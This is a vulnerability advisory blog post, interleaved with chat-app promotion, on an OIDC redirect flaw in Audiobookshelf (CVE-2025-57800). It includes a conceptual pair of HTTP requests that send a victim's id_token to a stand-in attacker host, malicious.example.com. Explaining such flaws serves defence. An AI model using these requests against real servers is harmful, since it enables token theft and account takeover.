Ameeba Blog Logo
Ameeba Chat App store presentation
Download Ameeba Chat Today
Ameeba Blog Search

CVE-2025-57800: OpenID Connect Authentication Bypass in Audiobookshelf

Ameeba’s Mission: Safeguarding privacy by securing data and communication with our patented anonymization technology.

Overview

The world of cybersecurity is constantly evolving. One of the latest vulnerabilities to be exposed is CVE-2025-57800, a critical vulnerability that affects the Audiobookshelf application. This vulnerability, if exploited, can lead to serious consequences including system compromise and data leakage. Given the severity of this vulnerability and the widespread use of the Audiobookshelf, this issue warrants urgent attention and immediate action.
This vulnerability specifically affects the Audiobookshelf versions from 2.6.0 to 2.26.3 when using OpenID Connect (OIDC) for authentication. It’s important to note that no Identity Provider (IdP) misconfiguration is required for this vulnerability to be exploited, meaning any implementation of Audiobookshelf that uses OIDC could be at risk.

Vulnerability Summary

CVE ID: CVE-2025-57800
Severity: High (8.8 CVSS Score)
Attack Vector: Network
Privileges Required: None
User Interaction: Required
Impact: System compromise and data leakage

Affected Products

Ameeba Chat Icon Escape the Surveillance Era

Most apps won’t tell you the truth.
They’re part of the problem.

Phone numbers. Emails. Profiles. Logs.
It’s all fuel for surveillance.

Ameeba Chat gives you a way out.

  • • No phone number
  • • No email
  • • No personal info
  • • Anonymous aliases
  • • End-to-end encrypted

Chat without a trace.

Product | Affected Versions

Audiobookshelf | 2.6.0 – 2.26.3

How the Exploit Works

The exploit operates by manipulating the redirect callback URLs during the OIDC authentication process. The attacker crafts a malicious login link that, once clicked by the unsuspecting user, prompts Audiobookshelf to store an arbitrary callback in a cookie. This callback is later used to redirect the user post-authentication.
The server then issues a 302 redirect to the attacker’s controlled URL, appending sensitive OIDC tokens as query parameters. This allows the attacker to intercept the victim’s tokens, potentially leading to a full account takeover. If the victim happens to be an administrator, the attacker could create persistent admin users, thereby amplifying the damage.

Conceptual Example Code

Here’s a simplified conceptual example to illustrate how this exploit might work. Let’s assume that the attacker has crafted a malicious login link:

GET /login?redirect=https://malicious.example.com/callback HTTP/1.1
Host: vulnerable-audiobookshelf.com

The victim clicks the link and logs in, unaware that they are being redirected to an attacker-controlled site:

GET /callback?id_token=eyJhbG... HTTP/1.1
Host: malicious.example.com

The attacker now has access to the victim’s tokens, which opens up a host of damaging possibilities, including account takeover and data theft.

Talk freely. Stay anonymous with Ameeba Chat.

Disclaimer:

The information and code presented in this article are provided for educational and defensive cybersecurity purposes only. Any conceptual or pseudocode examples are simplified representations intended to raise awareness and promote secure development and system configuration practices.

Do not use this information to attempt unauthorized access or exploit vulnerabilities on systems that you do not own or have explicit permission to test.

Ameeba and its authors do not endorse or condone malicious behavior and are not responsible for misuse of the content. Always follow ethical hacking guidelines, responsible disclosure practices, and local laws.

More posts

Ameeba Chat